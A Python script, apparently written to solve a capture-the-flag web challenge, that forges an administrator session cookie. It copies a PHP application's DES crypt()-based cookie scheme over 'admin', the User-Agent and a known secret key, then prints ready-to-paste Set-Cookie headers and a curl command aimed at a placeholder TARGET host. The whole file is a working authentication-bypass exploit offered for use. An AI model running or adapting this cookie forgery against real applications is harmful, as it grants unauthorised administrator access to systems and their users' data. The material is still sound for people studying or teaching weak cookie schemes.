#!/usr/bin/env python3
# generate_admin_cookie_passlib.py
# Produces ready-to-use Set-Cookie headers for user=admin replicating PHP crypt() with 2-char salt.
#
# Requires: pip install passlib
#
import sys
import time
import random
import email.utils
from passlib.hash import des_crypt   # pip install passlib

def generatesalt(n=2):
    characters = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
    return ''.join(random.choice(characters) for _ in range(n))

def make_secure_cookie(text, salt):
    """
    Replicates the PHP code:
      foreach (str_split($text, 8) as $el) { $secure_cookie .= crypt($el, $SALT); }
    using DES-based crypt (2-char salt). Each chunk becomes a 13-char crypt output;
    these are concatenated to form the secure_cookie.
    """
    chunks = [text[i:i+8] for i in range(0, len(text), 8)]
    out = "".join(des_crypt.hash(chunk, salt=salt) for chunk in chunks)
    return out

def http_expires_secs(seconds_from_now=3600):
    return email.utils.formatdate(time.time() + seconds_from_now, usegmt=True)

def generate_admin_cookie(enc_secret_key, user_agent=None, salt=None, lifetime=3600):
    if user_agent is None:
        user_agent = "Mozilla/5.0 (X11; Linux x86_64)"
    if salt is None:
        salt = generatesalt(2)
    secure_cookie_string = f"admin:{user_agent}:{enc_secret_key}"
    secure_cookie = make_secure_cookie(secure_cookie_string, salt)
    expires = http_expires_secs(lifetime)
    return {
        "user": "admin",
        "secure_cookie": secure_cookie,
        "salt": salt,
        "expires": expires,
        "path": "/"
    }

def main():
    args = sys.argv[1:]
    if len(args) >= 1:
        ENC_SECRET_KEY = args[0]
    else:
        print("Usage: python generate_admin_cookie_passlib.py <ENC_SECRET_KEY> [User-Agent] [salt]")
        sys.exit(1)

    ua = args[1] if len(args) >= 2 else "Mozilla/5.0 (X11; Linux x86_64)"
    salt_arg = args[2] if len(args) >= 3 else None

    cookie = generate_admin_cookie(ENC_SECRET_KEY, user_agent=ua, salt=salt_arg)
    print("# Ready-to-use Set-Cookie headers (paste into Burp / DevTools -> Request Headers)")
    print(f"Set-Cookie: user={cookie['user']}; Expires={cookie['expires']}; Path={cookie['path']}")
    print(f"Set-Cookie: secure_cookie={cookie['secure_cookie']}; Expires={cookie['expires']}; Path={cookie['path']}")
    print("\n# Example: curl with cookies (server sees your request's User-Agent):")
    print(f"curl -A \"{ua}\" -b \"user={cookie['user']}; secure_cookie={cookie['secure_cookie']}\" http://TARGET/")
    print("\n# If you want to use a specific salt (e.g. to match an existing cookie's salt), pass it as the 3rd arg.")
    print("# Note: replace TARGET with the challenge domain/host when using curl.")

if __name__ == "__main__":
    main()